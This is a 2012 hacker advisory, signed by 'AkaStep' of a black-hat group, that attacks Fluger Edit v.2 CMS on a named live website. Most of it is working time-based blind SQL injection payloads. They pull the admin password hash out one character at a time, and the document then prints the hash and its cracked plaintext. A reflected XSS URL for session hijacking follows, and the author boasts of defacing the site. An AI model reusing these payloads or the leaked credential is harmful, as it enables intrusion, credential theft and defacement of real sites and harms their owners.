=====================================================
Vulnerable Software:  Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection And XSS
Tested: In Wild
=====================================================


Dork :
Designed and developed by Fluger IT
All right reserved © | 2004 - 2012

************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************


======================================================
FULLY disclosured Real Exploitation examples:
GPC MUST BE=OFF

Theris Blind SQLi vulnerability on login page:

http://www.artclima.am/edit/ <===(Admin panel)


Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php

(Sorry i have no access to source code)

CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png

Due authentication mechanism you can't bypass login form by sending:
'or''='

Instead of you can use Time Based Way to obtain logins:password from admin table.
Here we go:

Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png




http://www.artclima.am/edit/index.php?error


Headers:

Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28



POST DATA:

username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


*REPLAY*


loginde Blind varidir.
Bypass getmir.

Time Based RuleZ!

www.artclima.am/edit/index.php?error

columnlar:

user
password


table: admin




=========================================

1 user var:

//TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir

cekek logini


login: admin


//TRUE

username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir



parolu cekek:


=========================================
1-ci simvol:      e

username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

2-ci simvol:  0

username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

3-cu simvol:     4

username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

4-cu simvol:     4

username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
5-ci simvol:       6

username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
6-ci simvol:        5

username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
7-ci simvol:       0

username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
8-ci simvol:       a

username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
9-cu simvol:      5

username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

10-cu simvol:       6

username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

11-ci simvol:      7

username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

12-ci simvol:       e

username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
13-cu simvol:          d

username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

yoxla sonra

=========================================
14-cu simvol:          2

username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
15-ci simvol:         b


username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

16-ci simvol:          2

username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================


17-ci simvol:          d

username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
18-ci simvol:          0

username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

19-cu simvol:            4

username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

20-ci simvol:              3

username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
21-ci simvol:              0

username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================
22-ci simvol:               3

username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

23-cu simvol:              e

username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
24-cu simvol:                 3

username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

25-ci simvol:                 7

username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

26-ci simvol:                   9

username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

27-ci simvol:                    3

username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

28-ci simvol:                     d


username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
29-cu simvol:            f

username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
30-cu simvol:                d

username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
31-ci simvol:                      9

username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir


=========================================

32-ci simvol:                      5

username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================


Verification:  +


//TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

MD5: e044650a567ed2b2d04303e3793dfd95

Resolves to: price777

Sure! I will "rm"-it too with great pleasure!

Rmned: http://zone-h.org/mirror/id/18295382





Second way: Session Hijack to gain access to admin panel:

XSS:
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1


Print Screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png





From source code of page:




<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
	<tr valign="top">
		<td class="bg_content">
			<div id="printarea">
				<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
					<tr>
						<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
						<td>&nbsp;</td>
					</tr>
				</table>
				<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >



==========================THE END=========================






SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep


02.09.2012